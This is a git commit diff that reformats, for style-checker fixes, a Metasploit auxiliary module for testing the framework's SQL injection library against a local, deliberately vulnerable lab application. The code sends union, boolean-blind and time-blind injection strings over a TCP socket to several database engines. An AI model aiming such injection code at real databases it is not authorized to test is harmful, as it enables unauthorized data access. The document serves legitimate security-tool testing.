Fix rubocop issues
This commit is contained in:
parent
f0b1aa44c9
commit
365cebce1a
|
@ -8,17 +8,15 @@ class MetasploitModule < Msf::Auxiliary
|
|||
update_info(
|
||||
info,
|
||||
'Name' => 'SQL injection testing module',
|
||||
'Description' => '
|
||||
'Description' => %q{
|
||||
This module tests the SQL injection library against a vulnerable application from https://github.com/red0xff/sqli_vulnerable
|
||||
',
|
||||
'Author' =>
|
||||
[
|
||||
'Redouane NIBOUCHA <rniboucha[at]yahoo.fr>'
|
||||
],
|
||||
},
|
||||
'Author' => [
|
||||
'Redouane NIBOUCHA <rniboucha[at]yahoo.fr>'
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => %w[linux],
|
||||
'References' =>
|
||||
['URL', 'https://github.com/red0xff/sqli_vulnerable'],
|
||||
'References' => ['URL', 'https://github.com/red0xff/sqli_vulnerable'],
|
||||
'DefaultTarget' => 0
|
||||
)
|
||||
)
|
||||
|
@ -27,12 +25,12 @@ class MetasploitModule < Msf::Auxiliary
|
|||
Opt::RHOST('127.0.0.1'),
|
||||
OptInt.new('RPORT', [true, 'The target port', 1337]),
|
||||
OptString.new('TARGETURI', [true, 'The target URI', '/']),
|
||||
OptEnum.new('SQLI_TYPE', [true, 'The type of SQL injection to test', 'Regular', %w(Regular BooleanBlind TimeBlind)]),
|
||||
OptEnum.new('SQLI_TYPE', [true, 'The type of SQL injection to test', 'Regular', %w[Regular BooleanBlind TimeBlind]]),
|
||||
OptBool.new('SAFE', [false, 'Use safe mode', false]),
|
||||
OptString.new('ENCODER', [false, 'an encoder to use (hex for example)', '']),
|
||||
OptBool.new('HEX_ENCODE_STRINGS', [false, 'Replace strings in the query with hex numbers?', false]),
|
||||
OptInt.new('TRUNCATION_LENGTH', [true, 'Test SQLi with truncated output (0 or negative to disable)', 0]),
|
||||
OptEnum.new('DBMS', [ true, 'The DBMS to target', 'MariaDB', %w(MariaDB PostgreSQL Sqlite MSSQL)])
|
||||
OptEnum.new('DBMS', [ true, 'The DBMS to target', 'MariaDB', %w[MariaDB PostgreSQL Sqlite MSSQL]])
|
||||
]
|
||||
)
|
||||
end
|
||||
|
@ -40,11 +38,11 @@ class MetasploitModule < Msf::Auxiliary
|
|||
def boolean_blind
|
||||
encoder = datastore['ENCODER'].empty? ? nil : datastore['ENCODER'].intern
|
||||
sqli = create_sqli(dbms: @dbms, opts: {
|
||||
encoder: encoder,
|
||||
hex_encode_strings: datastore['HEX_ENCODE_STRINGS'],
|
||||
concat_separator: '@',
|
||||
second_concat_separator: '#'
|
||||
}) do |payload|
|
||||
encoder: encoder,
|
||||
hex_encode_strings: datastore['HEX_ENCODE_STRINGS'],
|
||||
concat_separator: '@',
|
||||
second_concat_separator: '#'
|
||||
}) do |payload|
|
||||
sock = TCPSocket.open(datastore['RHOST'], datastore['RPORT'])
|
||||
sock.puts('0 or ' + payload + ' --')
|
||||
res = sock.gets.chomp
|
||||
|
@ -62,13 +60,13 @@ class MetasploitModule < Msf::Auxiliary
|
|||
encoder = datastore['ENCODER'].empty? ? nil : datastore['ENCODER'].intern
|
||||
truncation = datastore['TRUNCATION_LENGTH'] <= 0 ? nil : datastore['TRUNCATION_LENGTH']
|
||||
sqli = create_sqli(dbms: @dbms, opts: {
|
||||
encoder: encoder,
|
||||
hex_encode_strings: datastore['HEX_ENCODE_STRINGS'],
|
||||
truncation_length: truncation,
|
||||
safe: datastore['SAFE'],
|
||||
concat_separator: '@',
|
||||
second_concat_separator: '#'
|
||||
}) do |payload|
|
||||
encoder: encoder,
|
||||
hex_encode_strings: datastore['HEX_ENCODE_STRINGS'],
|
||||
truncation_length: truncation,
|
||||
safe: datastore['SAFE'],
|
||||
concat_separator: '@',
|
||||
second_concat_separator: '#'
|
||||
}) do |payload|
|
||||
sock = TCPSocket.open(datastore['RHOST'], datastore['RPORT'])
|
||||
sock.puts('0 union ' + payload)
|
||||
res = sock.gets&.chomp
|
||||
|
@ -85,11 +83,11 @@ class MetasploitModule < Msf::Auxiliary
|
|||
def time_blind
|
||||
encoder = datastore['ENCODER'].empty? ? nil : datastore['ENCODER'].intern
|
||||
sqli = create_sqli(dbms: @dbms, opts: {
|
||||
encoder: encoder,
|
||||
hex_encode_strings: datastore['HEX_ENCODE_STRINGS'],
|
||||
concat_separator: '@',
|
||||
second_concat_separator: '#'
|
||||
}) do |payload|
|
||||
encoder: encoder,
|
||||
hex_encode_strings: datastore['HEX_ENCODE_STRINGS'],
|
||||
concat_separator: '@',
|
||||
second_concat_separator: '#'
|
||||
}) do |payload|
|
||||
sock = TCPSocket.open(datastore['RHOST'], datastore['RPORT'])
|
||||
|
||||
if datastore['DBMS'] == 'MSSQL'
|
||||
|
@ -126,27 +124,27 @@ class MetasploitModule < Msf::Auxiliary
|
|||
case datastore['SQLI_TYPE']
|
||||
when 'Regular'
|
||||
@dbms = case datastore['DBMS']
|
||||
when 'MariaDB' then Msf::Exploit::SQLi::MySQLi::Common
|
||||
when 'PostgreSQL' then Msf::Exploit::SQLi::PostgreSQLi::Common
|
||||
when 'Sqlite' then Msf::Exploit::SQLi::SQLitei::Common
|
||||
when 'MSSQL' then Msf::Exploit::SQLi::Mssqli::Common
|
||||
end
|
||||
when 'MariaDB' then Msf::Exploit::SQLi::MySQLi::Common
|
||||
when 'PostgreSQL' then Msf::Exploit::SQLi::PostgreSQLi::Common
|
||||
when 'Sqlite' then Msf::Exploit::SQLi::SQLitei::Common
|
||||
when 'MSSQL' then Msf::Exploit::SQLi::Mssqli::Common
|
||||
end
|
||||
reflected
|
||||
when 'BooleanBlind'
|
||||
@dbms = case datastore['DBMS']
|
||||
when 'MariaDB' then Msf::Exploit::SQLi::MySQLi::BooleanBasedBlind
|
||||
when 'PostgreSQL' then Msf::Exploit::SQLi::PostgreSQLi::BooleanBasedBlind
|
||||
when 'Sqlite' then Msf::Exploit::SQLi::SQLitei::BooleanBasedBlind
|
||||
when 'MSSQL' then Msf::Exploit::SQLi::Mssqli::BooleanBasedBlind
|
||||
end
|
||||
when 'MariaDB' then Msf::Exploit::SQLi::MySQLi::BooleanBasedBlind
|
||||
when 'PostgreSQL' then Msf::Exploit::SQLi::PostgreSQLi::BooleanBasedBlind
|
||||
when 'Sqlite' then Msf::Exploit::SQLi::SQLitei::BooleanBasedBlind
|
||||
when 'MSSQL' then Msf::Exploit::SQLi::Mssqli::BooleanBasedBlind
|
||||
end
|
||||
boolean_blind
|
||||
when 'TimeBlind'
|
||||
@dbms = case datastore['DBMS']
|
||||
when 'MariaDB' then Msf::Exploit::SQLi::MySQLi::TimeBasedBlind
|
||||
when 'PostgreSQL' then Msf::Exploit::SQLi::PostgreSQLi::TimeBasedBlind
|
||||
when 'Sqlite' then Msf::Exploit::SQLi::SQLitei::TimeBasedBlind
|
||||
when 'MSSQL' then Msf::Exploit::SQLi::Mssqli::TimeBasedBlind
|
||||
end
|
||||
when 'MariaDB' then Msf::Exploit::SQLi::MySQLi::TimeBasedBlind
|
||||
when 'PostgreSQL' then Msf::Exploit::SQLi::PostgreSQLi::TimeBasedBlind
|
||||
when 'Sqlite' then Msf::Exploit::SQLi::SQLitei::TimeBasedBlind
|
||||
when 'MSSQL' then Msf::Exploit::SQLi::Mssqli::TimeBasedBlind
|
||||
end
|
||||
time_blind
|
||||
end
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue